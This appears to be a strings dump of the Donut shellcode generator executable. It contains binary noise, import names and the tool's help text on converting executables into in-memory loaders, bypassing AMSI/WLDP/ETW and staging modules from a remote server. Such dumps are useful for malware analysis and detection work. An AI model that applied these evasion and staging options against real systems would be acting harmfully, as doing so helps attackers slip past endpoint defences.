!This program cannot be run in DOS mode.
Rich;)
`.rdata
@.data
.pdata
@_RDATA
@.rsrc
@.reloc
VAVAWH
PA_A^^
|$ ATAUAVH
A^A]A\
|$ ATAUAVH
A^A]A\
D;l$`u
D$\;D$<|'A+
D;l$hs
H9D$Hrc
H9D$Hs:
D$ HcD$ H;
s+HcD$
HcL$ H
HcD$ H
D$0HcD$0
D$(HcD$(Hk
tcHcD$(Hk
D$8HcD$(Hk
H3D$8HcL$(H
t(HcD$PL
HcD$$H
HcD$(H
HcD$(H
D$,HcD$,L
HcD$,H
wlHcD$@H
D$(9D$ s&
D$H9D$ sy3
D$H9D$ sl3
D$H9D$ s>
D$H9D$ s>
D$H9D$ s#
H3E H3E
u/HcH<H
ffffff
fffffff
fffffff
ffffff
vKfffff
WATAUAVAWH
A_A^A]A\_
WATAUAVAWH
A_A^A]A\_
VWATAVAWH
A_A^A\_^
WATAUAVAWH
A_A^A]A\_
H;xXu5
AUAVAWH
u4I9}(
;I9}(tiH
0A_A^A]
UVWATAUAVAWH
`A_A^A]A\_^]
@USVWATAUAVAWH
A_A^A]A\_^[]
UVWATAUAVAWH
A_A^A]A\_^]
@SVWATAUAVAWH
L!|$(L!
D$0HcH
pA_A^A]A\_^[
B(I9A(
SVWATAUAVAWH
0A_A^A]A\_^[
t$ WATAUAVAWH
A_A^A]A\_
t$ WATAUAVAWH
0A_A^A]A\_
D$(H!L$ E3
;D$hsC
x AUAVAWH
0A_A^A]
x UAVAWH
D$@H;F
kL@8o(u
<htl<jt\<lt4<tt$<wt
|$ UATAUAVAWH
<Ct-<D
<St[A:
u<g~l<it[<ntP<ot,<pt
<utK@:
{,D+{HD+
A_A^A]A\]
WAVAWH
~,*u<I
A_A^_
u3HcH<H
WATAUAVAWH
0A_A^A]A\_
UVWATAUAVAWH
rsf;\$d
r_f;\$l
rKf;\$t
r7f;\$|
f;\$4r
f;\$<r
f;\$Dr
f;\$Lr
rvf;\$d
rbf;\$l
rNf;\$t
r:f;\$|
A_A^A]A\_^]
WATAUAVAWH
0A_A^A]A\_
u$D8r(t
D81uUL9r
uED8r(t
vAD8s(t
UVWAVAWH
A_A^_^]
:u(f9Q
utfD9A
ugfD9A
ATAVAWH
0A_A^A\
x ATAVAWH
A_A^A\
UVWAVAWH
0A_A^_^]
WAVAWH
fA9,@u
fA9,vu
0A_A^_
p0R^G'
t$ WAVAWH
A_A^_
WAVAWH
A_A^_
t#HcL$`H
s WAVAWH
0A_A^_
u~9t$Xt
UATAUAVAWH
A_A^A]A\]
D$0@8{
p*W4H
p*W4H
WATAUAVAWH
A_A^A]A\_
p0R^G'
L$ VWAVH
fD9t$b
UVWATAUAVAWH
fB9<A}1L
A_A^A]A\_^]
VWATAVAW
A_A^A\_^
AUAVAWH
@A_A^A]
@USVWATAUAVAWH
H!D$ I
hA_A^A]A\_^[]
D$0H9D$8
WATAUAVAWH
gfffffffH
A_A^A]A\_
{ AUAVAWH
0A_A^A]
t$xt*3
WAVAWH
A_A^_
x ATAVAWH
A_A^A\
L$ VWAVH
fD94H}aD
f9|$ tyf
|$":uq
f9)u4H9j
u%@8j(t
WAVAWH
@A_A^_
@USVWATAUAVAWH
xA_A^A]A\_^[]
u$D8r(t
fD91uTL9r
uED8r(t
v@D8s(t
UVWATAUAVAWH
PA_A^A]A\_^]
WATAUAVAWH
0A_A^A]A\_
H97u+A
@USVWATAUAVH
D8t$ht
D8t$ht
A^A]A\_^[]
l$ VWATAVAWH
L$&8\$&t,8Y
A_A^A\_^
UVWATAUAVAWH
xWI96tRI
0A_A^A]A\_^]
WATAUAVAWH
fB94ht
xXI96tSI
fC94wu
0A_A^A]A\_
@UATAUAVAWH
e0A_A^A]A\]
\$ VWATAUAVH
D!l$xA
@A^A]A\_^
x ATAVAWH
@8~8t
@8~0tM
A_A^A\
@SUVWATAUAVH
s5fE9!
fE9!fA
D$pfA;
NfD9d$pu
fD9d$pt+fD
0A^A]A\_^][
UVWATAUAVAWH
0A_A^A]A\_^]
SUWATAUAVAWH
`A_A^A]A\_][
AUAVAWH
@A_A^A]
WAVAWH
A_A^_
WATAUAVAWH
0A_A^A]A\_
x ATAVAWH
0A_A^A\
SUVWATAVAWH
A_A^A\_^][
@USVWATAVAWH
A_A^A\_^[]
@USVWAVH
pA^_^[]
T$`fA;
p WATAUAVAWH
A_A^A]A\_
T$xD;D$x
@USVWATAVAWH
fD9$Ou
0A_A^A\_^[]
fD9$wu
}HfD9#A
\$ UVWH
ATAUAVH
L$ fff
L$ |+L;
A^A]A\
@UATAUAVAWH
H!T$0D
u,!T$(H!T$
A_A^A]A\]
x UAVAWH
@SUVWATAVAWH
@A_A^A\_^][
ffffff
fffffff
@USVWATAUAVAWH
eHA_A^A]A\_^[]
ATAVAWH
A_A^A\
USVWAVH
A^_^[]
LcA<E3
t"HcM`H
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
aPLib v1.1.1 - the smaller the better :)
Copyright (c) 1998-2014 Joergen Ibsen, All Rights Reserved.
More information: http://www.ibsensoftware.com/
__based(
__cdecl
__pascal
__stdcall
__thiscall
__fastcall
__vectorcall
__clrcall
__eabi
__swift_1
__swift_2
__swift_3
__ptr64
__restrict
__unaligned
restrict(
delete
operator
`vftable'
`vbtable'
`vcall'
`typeof'
`local static guard'
`string'
`vbase destructor'
`vector deleting destructor'
`default constructor closure'
`scalar deleting destructor'
`vector constructor iterator'
`vector destructor iterator'
`vector vbase constructor iterator'
`virtual displacement map'
`eh vector constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`copy constructor closure'
`udt returning'
`local vftable'
`local vftable constructor closure'
new[]
delete[]
`omni callsig'
`placement delete closure'
`placement delete[] closure'
`managed vector constructor iterator'
`managed vector destructor iterator'
`eh vector copy constructor iterator'
`eh vector vbase copy constructor iterator'
`dynamic initializer for '
`dynamic atexit destructor for '
`vector copy constructor iterator'
`vector vbase copy constructor iterator'
`managed vector copy constructor iterator'
`local static thread guard'
operator ""
operator co_await
operator<=>
Type Descriptor'
Base Class Descriptor at (
Base Class Array'
Class Hierarchy Descriptor'
Complete Object Locator'
`anonymous namespace'
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
InitializeCriticalSectionEx
Unknown exception
bad exception
(null)
CorExitProcess
AreFileApisANSI
CompareStringEx
LCMapStringEx
LocaleNameToLCID
AppPolicyGetProcessTerminationMethod
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
UTF-16LEUNICODE
NAN(SNAN)
nan(snan)
NAN(IND)
nan(ind)
!"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
[aOni*{
~ $s%r
@b;zO]
v2!L.2
1#QNAN
1#SNAN
UUUUUU
UUUUUU
=imb;D
/>58d%
VM >cQ6
>jtm}S
)>6{1n
+f)>0'
;H9>&X
*StO9>T
n03>Pu
K~Je#>!
bp(=>?g
BC?>6t9^
K&>.yC
.xJ>Hf
y\PD>!
|b=})>
c [1>H'
uzKs@>
3>N;kU
kE>fvw
V6E>`"(5
?UUUUUU
?7zQ6$
.text$mn
.text$mn$00
.text$x
.idata$5
.00cfg
.CRT$XCA
.CRT$XCAA
.CRT$XCZ
.CRT$XIA
.CRT$XIAA
.CRT$XIAC
.CRT$XIC
.CRT$XIZ
.CRT$XPA
.CRT$XPX
.CRT$XPXA
.CRT$XPZ
.CRT$XTA
.CRT$XTZ
.rdata
.rdata$r
.rdata$voltmd
.rdata$zzzdbg
.rtc$IAA
.rtc$IZZ
.rtc$TAA
.rtc$TZZ
.xdata
.xdata$x
.idata$2
.idata$3
.idata$4
.idata$6
.data$r
.data$rs
.pdata
_RDATA
.rsrc$01
.rsrc$02
CryptAcquireContextA
CryptReleaseContext
CryptGenRandom
ADVAPI32.dll
OpenClipboard
CloseClipboard
SetClipboardData
EmptyClipboard
USER32.dll
CloseHandle
MapViewOfFile
UnmapViewOfFile
GetModuleHandleA
GetProcAddress
CreateFileMappingA
GlobalAlloc
GlobalLock
GlobalFree
RtlCaptureContext
RtlLookupFunctionEntry
RtlVirtualUnwind
UnhandledExceptionFilter
SetUnhandledExceptionFilter
GetCurrentProcess
TerminateProcess
IsProcessorFeaturePresent
QueryPerformanceCounter
GetCurrentProcessId
GetCurrentThreadId
GetSystemTimeAsFileTime
InitializeSListHead
IsDebuggerPresent
GetStartupInfoW
GetModuleHandleW
KERNEL32.dll
RtlUnwindEx
GetLastError
SetLastError
EnterCriticalSection
LeaveCriticalSection
DeleteCriticalSection
InitializeCriticalSectionAndSpinCount
TlsAlloc
TlsGetValue
TlsSetValue
TlsFree
FreeLibrary
LoadLibraryExW
EncodePointer
RaiseException
RtlPcToFileHeader
RtlUnwind
ExitProcess
GetModuleHandleExW
CreateFileW
GetDriveTypeW
GetFileInformationByHandle
GetFileType
PeekNamedPipe
SystemTimeToTzSpecificLocalTime
FileTimeToSystemTime
SetStdHandle
GetStdHandle
WriteFile
GetModuleFileNameW
GetCommandLineA
GetCommandLineW
HeapAlloc
HeapFree
FlsAlloc
FlsGetValue
FlsSetValue
FlsFree
CompareStringW
LCMapStringW
GetConsoleOutputCP
GetConsoleMode
GetFileSizeEx
SetFilePointerEx
GetCurrentDirectoryW
GetFullPathNameW
MultiByteToWideChar
HeapReAlloc
FindClose
FindFirstFileExW
FindNextFileW
IsValidCodePage
GetACP
GetOEMCP
GetCPInfo
WideCharToMultiByte
GetEnvironmentStringsW
FreeEnvironmentStringsW
SetEnvironmentVariableW
GetStringTypeW
GetProcessHeap
SetEndOfFile
ReadFile
ReadConsoleW
FlushFileBuffers
GetTimeZoneInformation
HeapSize
WriteConsoleW
D$4Wj<3
L$lYPh
L$$QPW
D$$PVW
D$$PVW
D$(+D$,
D$@vf3
D$XPVh
zVRVQh
EP;D$<
XPVVh
D$4PVVV
D$<f;N
;HPsCf
|$Tj>Y
D$4PQQQ
H9D$$s
L$0QVPR
D$$;D$
VVVVVUP
WAVAWH
H!|$(L
UVWAVAWH
A_A^_^]
@USVWATAUAVAWH
A_A^A]A\_^[]
USVWATAUAVAWH
H3D$ H;
A_A^A]A\_^[]
L9[0t.M
VWATAVAWH
A_A^A\_^
VWATAVAWH
A_A^A\_^
UVWATAUAVAWH
D$D+D$HA
D9l$@v;A
A_A^A]A\_^]
USVWATAUAVAWH
D$XA9FP
@8;teH
A;D$PsmA
A_A^A]A\_^[]
D87tAE9
A88t.H
t$ UWAVH
t$ WATAUAVAWH
A_A^A]A\_
t9HcC<
UVWATAUAVAWH
A_A^A]A\_^]
t$ WAVAWH
0A_A^_
UATAVH
kernel32.dll
LoadLibraryA
kernel32.dll
GetProcAddress
kernel32.dll
GetModuleHandleA
kernel32.dll
VirtualAlloc
kernel32.dll
VirtualFree
kernel32.dll
VirtualQuery
kernel32.dll
VirtualProtect
kernel32.dll
kernel32.dll
MultiByteToWideChar
kernel32.dll
GetUserDefaultLCID
kernel32.dll
WaitForSingleObject
kernel32.dll
CreateThread
kernel32.dll
CreateFileA
kernel32.dll
GetFileSizeEx
kernel32.dll
GetThreadContext
kernel32.dll
GetCurrentThread
kernel32.dll
GetCurrentProcess
kernel32.dll
GetCommandLineA
kernel32.dll
GetCommandLineW
kernel32.dll
HeapAlloc
kernel32.dll
HeapReAlloc
kernel32.dll
GetProcessHeap
kernel32.dll
HeapFree
kernel32.dll
GetLastError
kernel32.dll
CloseHandle
shell32.dll
CommandLineToArgvW
oleaut32.dll
SafeArrayCreate
oleaut32.dll
SafeArrayCreateVector
oleaut32.dll
SafeArrayPutElement
oleaut32.dll
SafeArrayDestroy
oleaut32.dll
SafeArrayGetLBound
oleaut32.dll
SafeArrayGetUBound
oleaut32.dll
SysAllocString
oleaut32.dll
SysFreeString
oleaut32.dll
LoadTypeLib
wininet.dll
InternetCrackUrlA
wininet.dll
InternetOpenA
wininet.dll
InternetConnectA
wininet.dll
InternetSetOptionA
wininet.dll
InternetReadFile
wininet.dll
InternetQueryDataAvailable
wininet.dll
InternetCloseHandle
wininet.dll
HttpOpenRequestA
wininet.dll
HttpSendRequestA
wininet.dll
HttpQueryInfoA
mscoree.dll
CorBindToRuntime
mscoree.dll
CLRCreateInstance
ole32.dll
CoInitializeEx
ole32.dll
CoCreateInstance
ole32.dll
CoUninitialize
ntdll.dll
RtlEqualUnicodeString
ntdll.dll
RtlEqualString
ntdll.dll
RtlUnicodeStringToAnsiString
ntdll.dll
RtlInitUnicodeString
ntdll.dll
RtlExitUserThread
ntdll.dll
RtlExitUserProcess
ntdll.dll
RtlCreateUnicodeString
ntdll.dll
RtlGetCompressionWorkSpaceSize
ntdll.dll
RtlDecompressBuffer
ntdll.dll
NtContinue
ntdll.dll
NtCreateSection
ntdll.dll
NtMapViewOfSection
ntdll.dll
NtUnmapViewOfSection
Xntdll
RtlGetCompressionWorkSpaceSize
RtlCompressBuffer
v4.0.30319
HMN34P67R9TWCXYF
ole32;oleaut32;wininet;mscoree;shell32
WScript
wscript.exe
AmsiInitialize
AmsiScanBuffer
AmsiScanString
WldpQueryDynamicCodeTrust
WldpIsClassInApprovedList
EtwEventWrite
EtwEventUnregister
kernelbase
_acmdln;__argv;__p__acmdln;__p___argv;_wcmdln;__wargv;__p__wcmdln;__p___wargv
ExitProcess;exit;_exit;_cexit;_c_exit;quick_exit;_Exit
loader.bin
loader.b64
loader.rb
loader.c
thread
loader.py
loader.ps1
loader.cs
base64
loader.hex
loader.uuid
http://
https://
python
No error.
csharp
File not found.
File is empty.
Cannot open file.
File is invalid.
File is a .NET DLL. Donut requires a class and method.
Memory allocation failed.
Invalid architecture specified.
Invalid URL.
Invalid URL length.
Invalid parameter.
Error generating random values.
Invalid bypass option specified.
Unable to locate DLL function provided. Names are case sensitive.
bypass
Target architecture cannot support selected DLL/EXE file.
You've supplied parameters for an unmanaged DLL. Donut also requires a DLL function.
Invalid PE headers preservation option.
The output format is invalid.
The compression engine is invalid.
There was an error during compression.
Invalid entropy level specified.
Path of decoy module is invalid.
Mixed (native and managed) assemblies are currently unsupported.
process
WARNING: Invalid architecture specified: %d -- setting to x86+amd64
WARNING: Invalid exit option specified: %d -- setting to thread
WARNING: Invalid entropy option specified: %d -- setting to default
powershell
WARNING: Invalid format specified: %d -- setting to binary.
usage: donut [options] <EXE/DLL/VBS/JS>
Only the finest artisanal donuts are made of shells.
-MODULE OPTIONS-
-FILE OPTIONS-
-n,--modname: <name> Module name for HTTP staging. If entropy is enabled, this is generated randomly.
-PIC/SHELLCODE OPTIONS-
donut -ic2.dll
-s,--server: <server> Server that will host the Donut module. Credentials may be provided in the following format: https://username:password@192.168.0.1/
-e,--entropy: <level> Entropy. 1=None, 2=Use random names, 3=Random names + symmetric encryption (default)
[ Donut shellcode generator v1 (built Mar 3 2023 13:33:22)
-a,--arch: <arch>,--cpu: <arch> Target architecture : 1=x86, 2=amd64, 3=x86+amd64(default).
-o,--output: <path> Output file to save loader. Default is "loader.bin"
-f,--format: <format> Output format. 1=Binary (default), 2=Base64, 3=C, 4=Ruby, 5=Python, 6=Powershell, 7=C#, 8=Hex
-y,--fork: <addr> Create thread for loader and continue execution at <addr> supplied.
-x,--exit: <action> Exit behaviour. 1=Exit thread (default), 2=Exit process, 3=Do not exit or cleanup and block indefinitely
-c,--class: <namespace.class> Optional class name. (required for .NET DLL)
-d,--domain: <name> AppDomain name to create for .NET assembly. If entropy is enabled, this is generated randomly.
-i,--input: <path>,--file: <path> Input file to execute in-memory.
-EXTRA-
[ Copyright (c) 2019-2021 TheWover, Odzhan
headers
-m,--method: <method>,--function: <api> Optional method or function for DLL. (a method is required for .NET DLL)
-p,--args: <arguments> Optional parameters/command line inside quotations for DLL method/function or EXE.
examples:
domain
-w,--unicode Command line is passed to unmanaged DLL function in UNICODE format. (default is ANSI)
entropy
-r,--runtime: <version> CLR runtime version. MetaHeader used by default or v4.0.30319 if none available.
x86+amd64
format
-t,--thread Execute the entrypoint of an unmanaged EXE as a thread.
-z,--compress: <engine> Pack/Compress file. 1=None, 2=aPLib, 3=LZNT1, 4=Xpress.
-b,--bypass: <level> Bypass AMSI/WLDP/ETW : 1=None, 2=Abort on fail, 3=Continue on fail.(default)
-k,--headers: <level> Preserve PE headers. 1=Overwrite (default), 2=Keep all
-j,--decoy: <level> Optional path of decoy module for Module Overloading.
method;function
donut --arch:x86 --class:TestClass --method:RunProcess --args:notepad.exe --input:loader.dll
input;file
modname
donut -iloader.dll -c TestClass -m RunProcess -p"calc notepad" -s http://remote_server.com/modules/
Embedded
output
params;args
runtime
server
thread
unicode
oep;fork
compress
[ Error : %s
.NET DLL
Xpress
.NET EXE
VBScript
JScript
Unrecognized
[ Instance type : %s
[ Module file : "%s"
Random Names
Random names + Encryption
[ Entropy : %s
[ Compressed : %s (Reduced by %d%%)
[ File type : %s
[ Class : %s
[ Method : %s
Default
[ Domain : %s
DllMain
[ Function : %s
[ Parameters : %s
[ Target CPU : %s
[ Module name : %s
[ Upload to : %s
continue
[ AMSI/WDLP/ETW : %s
overwrite
Undefined
[ PE Headers : %s
[ Shellcode : "%s"
[ OEP : 0x%X
[ Decoy path : %s
Thread
Process
Undefined
[ Exit : %s
unsigned char buf[] =
\x%02x
buf = ""
buff += "
\x%02x
[Byte[]] $buf =
0x%02x
byte[] my_buf = new byte[%d] {
0x%02x
\x%02x
%02x%02x%02x%02x-
%02x%02x-
%02x%02x-
%02x%02x-
%02x%02x%02x%02x%02x%02x
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
.?AVbad_exception@std@@
.?AVexception@std@@
.?AVtype_info@@
api-ms-win-core-fibers-l1-1-1
api-ms-win-core-synch-l1-2-0
kernel32
api-ms-
(null)
mscoree.dll
api-ms-win-core-datetime-l1-1-1
api-ms-win-core-file-l1-2-2
api-ms-win-core-localization-l1-2-1
api-ms-win-core-localization-obsolete-l1-2-0
api-ms-win-core-processthreads-l1-1-2
api-ms-win-core-string-l1-1-0
api-ms-win-core-sysinfo-l1-2-1
api-ms-win-core-winrt-l1-1-0
api-ms-win-core-xstate-l2-1-0
api-ms-win-rtcore-ntuser-window-l1-1-0
api-ms-win-security-systemfunctions-l1-1-0
ext-ms-win-ntuser-dialogbox-l1-1-0
ext-ms-win-ntuser-windowstation-l1-1-0
advapi32
api-ms-win-appmodel-runtime-l1-1-2
user32
ext-ms-
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
((((( H
((((( H
(
zh-CHS
az-AZ-Latn
uz-UZ-Latn
kok-IN
syr-SY
div-MV
quz-BO
sr-SP-Latn
az-AZ-Cyrl
uz-UZ-Cyrl
quz-EC
sr-SP-Cyrl
quz-PE
smj-NO
bs-BA-Latn
smj-SE
sr-BA-Latn
sma-NO
sr-BA-Cyrl
sma-SE
sms-FI
smn-FI
zh-CHT
az-az-cyrl
az-az-latn
bs-ba-latn
div-mv
kok-in
quz-bo
quz-ec
quz-pe
sma-no
sma-se
smj-no
smj-se
smn-fi
sms-fi
sr-ba-cyrl
sr-ba-latn
sr-sp-cyrl
sr-sp-latn
syr-sy
uz-uz-cyrl
uz-uz-latn
zh-chs
zh-cht
CONOUT$
VS_VERSION_INFO
StringFileInfo
080904E4
FileDescription
Donut shellcode generator
FileVersion
InternalName
OriginalFilename
donut.exe
ProductName
ProductVersion
VarFileInfo
Translation